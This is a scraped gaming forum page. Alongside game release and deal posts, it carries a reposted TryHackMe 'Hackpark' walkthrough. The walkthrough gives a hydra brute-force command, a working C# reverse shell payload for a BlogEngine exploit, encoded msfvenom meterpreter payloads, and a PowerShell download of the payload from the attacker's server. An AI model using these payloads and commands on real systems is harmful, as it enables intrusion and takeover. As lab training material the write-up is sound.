| Welcome, Guest |
You have to register before you can post on our site.
|
| Online Users |
There are currently 496 online users.
» 0 Member(s) | 494 Guest(s)
Applebot, Google
|
|
|
| PC - Colossal Cave |
|
Posted by: xSicKxBot - 01-20-2023, 08:32 PM - Forum: New Game Releases
- No Replies
|
 |
Colossal Cave
Colossal Cave is an exciting point & click adventure into a mysterious cavern - a re-imagining of the celebrated text adventure by Will Crowther & Don Woods. Acclaimed game designer Roberta Williams brings you her vision of the game that inspired her to create her own legendary games. <p>Publisher: Cygnus Entertainment<p>Release Date: Jan 19, 2023
https://www.metacritic.com/game/pc/colossal-cave
|
|
|
| [Tut] How I Solved the Hackpark Walkthrough (TryHackMe) |
|
Posted by: xSicKxBot - 01-19-2023, 09:07 PM - Forum: Python
- No Replies
|
|
How I Solved the Hackpark Walkthrough (TryHackMe)
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1068923","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/hackpark-walkthrough-tryhackme/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FzSsY4-Qr5b8%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/hackpark" target="_blank" rel="noreferrer noopener">hackpark</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: <code>user</code> and <code>root</code> flags on a windows machine</li>
<li><strong>Highlight</strong>: using <code>metasploit</code> to quickly and easily gain root access </li>
<li><strong>Tools</strong>: <code>nmap</code>, <code>dirb</code>, <code>hydra</code>, <code>burpsuite</code>, <code>msfvenom</code></li>
<li><strong>Tags</strong>: RCE (remote code execution), Windows</li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="718" height="893" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-189.png" alt="" class="wp-image-1068966" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-189.png 718w, https://blog.finxter.com/wp-content/uplo...41x300.png 241w" sizes="(max-width: 718px) 100vw, 718px" /></figure>
</div>
<p>In this box, we will hack into a windows machine using standard pen-testing tools. There are two options for solving the box. </p>
<p>I’ll demonstrate in this post how to hack into the box with <code>metasploit</code>. In the upcoming Hackpark Part II post, I’ll show how to find the flags without using <code>metasploit</code>.</p>
<h2>ATTACK MAP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="521" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-182-1024x521.png" alt="" class="wp-image-1068933" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-182-1024x521.png 1024w, https://blog.finxter.com/wp-content/uplo...00x153.png 300w, https://blog.finxter.com/wp-content/uplo...68x391.png 768w, https://blog.finxter.com/wp-content/uplo...ge-182.png 1189w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>IPs</p>
<p>First, let’s record our IP addresses in export format to use as bash variables.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export myIP=10.6.2.23
export targetIP=10.10.72.99</pre>
<h2>ENUMERATION</h2>
<p>We’ll kick things off with a <code>dirb</code> scan and an <code>nmap</code> scan.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">/admin is discovered on targetIP with dirb. ┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
</pre>
<p>The <code>ms-wbt-server</code> looks interesting. A quick google search shows that this port is used for windows remote desktop. We may come back to this later on in the hack.</p>
<h2>PREPPING OUR COMMAND FOR HYDRA</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="683" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-190-1024x683.png" alt="" class="wp-image-1068968" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-190-1024x683.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-190.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Next, we’ll use firefox in developer mode to inspect the POST request when we attempt to login to the <code>/admin</code> portal with generic credentials (<code>admin:pass</code>).</p>
<pre class="wp-block-preformatted"><code>__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in</code>
</pre>
<p>Next, we’ll prepare our command for hydra to use to brute-force our way into the admin portal.</p>
<pre class="wp-block-preformatted"><code>hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"</code></pre>
<ul>
<li><code>-l</code> is for username</li>
<li><code>-P</code> is for password wordlist </li>
<li><code>http-post-form</code> specifies the type of TCP request</li>
<li><code>:Login</code> failed (at the end of the command) specifies the message response after a failed login attempt</li>
</ul>
<p>Results:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
[80][http-post-form] host: 10.10.208.243 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43
</pre>
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="503" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-191-1024x503.png" alt="" class="wp-image-1068969" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-191-1024x503.png 1024w, https://blog.finxter.com/wp-content/uplo...00x147.png 300w, https://blog.finxter.com/wp-content/uplo...68x377.png 768w, https://blog.finxter.com/wp-content/uplo...ge-191.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Now we can log in with the <code>user:password</code> combo <code>admin:1qaz2wsx</code></p>
<p>We are shown an admin dashboard. Searching up <code>blogengine</code> in <em>exploits-db.com</em> reveals a possible exploit for us to use: (<a rel="noreferrer noopener" href="https://www.exploit-db.com/exploits/46353" target="_blank">CVE-2019-6714</a>). </p>
<p>To use the exploit, we need to upload the exploit’s payload (<code>PostView.ascx</code>) through the file manager. We can then trigger it by accessing the following address in our browser: </p>
<p><em>http://10.10.172.59/?theme=../../App_Data/files</em></p>
<p>And we should then be able to catch the <a href="https://blog.finxter.com/python-one-line-reverse-shell/" data-type="post" data-id="11536" target="_blank" rel="noreferrer noopener">revshell</a> with a <code>netcat</code> listener.</p>
<h2>PREPARE THE PAYLOAD</h2>
<p>We need to change the IP and ports (in bold below) in the following payload, and then save it as <code>PostView.ascx</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">payload:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888)) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script>
<asp laceHolder ID="phContent" runat="server" EnableViewState="false"></asplaceHolder>
</pre>
<h2>SET UP THE NC LISTENER</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="715" height="894" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-192.png" alt="" class="wp-image-1068971" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-192.png 715w, https://blog.finxter.com/wp-content/uplo...40x300.png 240w" sizes="(max-width: 715px) 100vw, 715px" /></figure>
</div>
<p>Next, let’s spin up a <code>netcat</code> listener with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<h2>TRIGGER THE REV SHELL</h2>
<p>Now that our malicious payload is uploaded and our <code>netcat</code> listener is activated, all we have to do is navigate to the following address, and we should catch the reverse shell as planned. </p>
<p><em>http://10.10.172.59/?theme=../../App_Data/files</em></p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="397" height="230" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-183.png" alt="" class="wp-image-1068942" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-183.png 397w, https://blog.finxter.com/wp-content/uplo...00x174.png 300w" sizes="(max-width: 397px) 100vw, 397px" /></figure>
</div>
<p>And … bingo! We’ve caught the revshell and we are in with our initial foothold!</p>
<h2>UPGRADE THE SHELL TO METERPRETER</h2>
<p>Now that we are in the shell, we can work to upgrade our shell to a meterpreter shell. This will allow us to use many powerful tools within metasploit framework. </p>
<p>We’ll use <code>python3</code> to spin up a <a href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank" rel="noreferrer noopener">simple HTTP server</a> that can help us serve the reverse meterpreter shell payload file to the windows machine. </p>
<h2>USE MSFVENOM TO CREATE REVSHELL PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-193-1024x684.png" alt="" class="wp-image-1068973" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-193-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-193.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>The following command will create the payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe</pre>
<p>The payload did not work on my machine, so I added encoding using a standard encoder, the “shikata gai nai”. </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe</pre>
<h2>TRANSFER THE MSFVENOM PAYLOAD TO TARGET</h2>
<p>Next, we’ll transfer the encoded payload from our attack machine to the target machine. </p>
<p>Let’s navigate to the directory that holds the <code>payload.exe</code> on our attack machine. Then we’ll spin up a simple HTTP server using the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Python3 -m http.server</pre>
<p>Then we’ll grab the file and copy it to our target Windows machine from the HTTP server:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"</pre>
<p>Notice that we save the file in the <code>Temp</code> directory because we have to write permissions there. This is a common configuration that can be leveraged as an unprivileged user.</p>
<h2>CATCH THE METERPRETER SHELL WITH METASPLOIT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="683" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-194-1024x683.png" alt="" class="wp-image-1068975" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-194-1024x683.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-194.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>First, let’s fire up Metasploit console:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfconsole</pre>
<p>Then load the handler:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">use exploit/multi/handler</pre>
<p>Next, we need to set the <code>lport</code>, <code>lhost</code>, and set the payload to <code>windows/meterpreter/reverse_tcp</code></p>
<p>Now that everything is set up correctly, we can run it to boot up the meterpreter listener:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Run</pre>
<p>activate the <code>shell.exe</code> on the target machine to throw a meterpreter revshell</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="943" height="547" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-184.png" alt="" class="wp-image-1068944" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-184.png 943w, https://blog.finxter.com/wp-content/uplo...00x174.png 300w, https://blog.finxter.com/wp-content/uplo...68x445.png 768w" sizes="(max-width: 943px) 100vw, 943px" /></figure>
</div>
<p>And we got it! The lower left console window shows the meterpreter shell.</p>
<p>Now that we are running a meterpreter shell in <code>msfconsole</code> we can quickly pwn the system with:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getsystem</pre>
<p>And view the system information:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sysinfo</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="533" height="359" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-185.png" alt="" class="wp-image-1068945" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-185.png 533w, https://blog.finxter.com/wp-content/uplo...00x202.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></figure>
</div>
<p>We can view our user information with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getuid</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="468" height="71" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-186.png" alt="" class="wp-image-1068947" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-186.png 468w, https://blog.finxter.com/wp-content/uplo...300x46.png 300w" sizes="(max-width: 468px) 100vw, 468px" /></figure>
</div>
<p>Since we are already NT Authority, thanks to the magical powers of Metasploit, we don’t need to do anything else except locate and retrieve the two flags.</p>
<p>We found both flags!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="518" height="378" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-187.png" alt="" class="wp-image-1068948" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-187.png 518w, https://blog.finxter.com/wp-content/uplo...00x219.png 300w" sizes="(max-width: 518px) 100vw, 518px" /></figure>
</div>
<p>In the next post, I’ll walk you through an alternate solution to this box without needing Metasploit.</p>
</div>
https://www.sickgaming.net/blog/2023/01/...tryhackme/
|
|
|
|
| (Indie Deal) FREE Glorkian Warrior & THQ Nordic Sale |
|
Posted by: xSicKxBot - 01-19-2023, 09:07 PM - Forum: Deals or Specials
- No Replies
|
|
FREE Glorkian Warrior & THQ Nordic Sale
<div class="bb_h1">Glorkian Warrior: The Trials Of Glork FREEbie</div><a class="bb_link" href="https://steamcommunity.com/linkfilter/?url=https://freebies.indiegala.com/glorkian-warrior-the-trials-of-glork" target="_blank" rel=" noopener" ><img src="https://cdn.cloudflare.steamstatic.com/steamcommunity/public/images/clans/3402923/5943e9841e1c10b175d5687310184b86d3d4f0b3.jpg" /></a><span class="bb_link_host">[freebies.indiegala.com]</span><br><br><div class="bb_h1"><a class="bb_link" href="https://steamcommunity.com/linkfilter/?url=https://www.indiegala.com/store/game/one-piece-odyssey/814000_pre" target="_blank" rel=" noopener" >ONE PIECE ODYSSEY coming soon</a><span class="bb_link_host">[www.indiegala.com]</span></div><a class="bb_link" href="https://www.youtube.com/watch?v=GHXtyxULPX0" target="_blank" rel="" id="dynamiclink_11">https://www.youtube.com/watch?v=GHXtyxULPX0</a><br><div class="bb_h1">THQ Nordic Winter Sale, up to 80% OFF</div><a class="bb_link" href="https://steamcommunity.com/linkfilter/?url=https://www.indiegala.com/store/publisher-sale/thq-nordic" target="_blank" rel=" noopener" ><img src="https://cdn.cloudflare.steamstatic.com/steamcommunity/public/images/clans/3402923/4d47fe4d20f81b5eeb4e61bf6d8f6dc6094ac625.jpg" /></a><span class="bb_link_host">[www.indiegala.com]</span><br><div class="bb_h1">Raiser Games Winter Sale, up to 90% off</div><a class="bb_link" href="https://steamcommunity.com/linkfilter/?url=https://www.indiegala.com/store/publisher-sale/raiser-games" target="_blank" rel=" noopener" ><img src="https://cdn.cloudflare.steamstatic.com/steamcommunity/public/images/clans/3402923/e898784620230a17f381cfa2f96f97ec74791621.jpg" /></a><span class="bb_link_host">[www.indiegala.com]</span><br><div class="bb_h1"><a class="bb_link" href="https://steamcommunity.com/linkfilter/?url=https://www.indiegala.com/store/game/hogwarts-legacy/990080" target="_blank" rel=" noopener" >Pre-Purchase Hogwarts Legacy</a><span class="bb_link_host">[www.indiegala.com]</span></div><a class="bb_link" href="https://www.youtube.com/watch?v=vRXGPwyfTCc" target="_blank" rel="" id="dynamiclink_12">https://www.youtube.com/watch?v=vRXGPwyfTCc</a>
https://steamcommunity.com/groups/indieg...2373191380
|
|
|
|
| PC - A Space For The Unbound |
|
Posted by: xSicKxBot - 01-19-2023, 09:07 PM - Forum: New Game Releases
- No Replies
|
|
A Space For The Unbound
A Space For The Unbound is a slice-of-life adventure game with beautiful pixel art set in the late 90s rural Indonesia that tells a story about overcoming anxiety, depression, and the relationship between a boy and a girl with supernatural powers.
Follow two high school sweethearts, Atma and Raya, on a journey of self-discovery at the end of their high school years. When a mysteriously supernatural power is suddenly unleashed threatening their existence, they must explore and investigate their town to uncover hidden secrets, face the end of the world, and perhaps learn more about each other.<p>Publisher: PQube<p>Release Date: Jan 19, 2023
https://www.metacritic.com/game/pc/a-spa...he-unbound
|
|
|
|
| News - Fortnite Falcon Scout Explained And How To Get It |
|
Posted by: xSicKxBot - 01-19-2023, 04:29 AM - Forum: Lounge
- No Replies
|
|
Fortnite Falcon Scout Explained And How To Get It
<p><a href="https://www.gamespot.com/games/fortnite/">Fortnite</a> Chapter 4 Season 1 is littered with creative items that have quickly become fan favorites, so it stands to reason that Epic would want to continue pumping out more exciting ways to keep players engaged. And with the brand-new <strong>Falcon Scout</strong> item, it has added a whole new layer to recon, combat, and looting all at once. Read on to find out about this remotely controlled "caw" machine.</p><h2>How to get Falcon Scouts in Fortnite and how they work</h2><p>Falcon Scouts have unlimited uses and <strong>can be found on the ground, in chests, or in supply drops</strong>. But if you're really desperate to find one, you're likely to have the best luck with getting them to pop out of <strong>Oathbound Chests</strong>. These large, white chests can be found in the medieval sections of the map in the west and southeast, which are characterized by an autumn vibe with colorful, fallen leaves and old-timey structures.</p><figure data-align="center" data-size="large" data-img-src="https://www.gamespot.com/a/uploads/original/679/6794662/4087883-falcon-2.jpg" data-ref-id="1300-4087883" data-ratio="0.5625" data-width="1920" data-embed-type="image" style="width: 1920px"><a href="https://www.gamespot.com/a/uploads/original/679/6794662/4087883-falcon-2.jpg"><img alt="You can use Falcon Scouts to pick up loot and bring it back to you." src="https://www.gamespot.com/a/uploads/scale_super/679/6794662/4087883-falcon-2.jpg" srcset="https://www.gamespot.com/a/uploads/original/679/6794662/4087883-falcon-2.jpg 1920w, https://www.gamespot.com/a/uploads/scale...lcon-2.jpg 1280w, https://www.gamespot.com/a/uploads/scale...lcon-2.jpg 480w" sizes="(max-width: 1280px) 100vw, 1280px" data-width="1280"></a><figcaption>You can use Falcon Scouts to pick up loot and bring it back to you.</figcaption></figure><p>Once you've obtained a Falcon Scout, you can equip it and use the fire button to deploy the mechanical bird into the sky. Your view will shift to behind the falcon, granting you full control of where it goes. While in this mode, you can fly around to open containers, pick up loot, or even <strong>grab a downed teammate and fly them to safety</strong>--or just snag their reboot card, if they're already eliminated. Additionally, you can provide recon to your team by pinging locations or "cawing" to ping all nearby enemies in a certain radius.</p><a 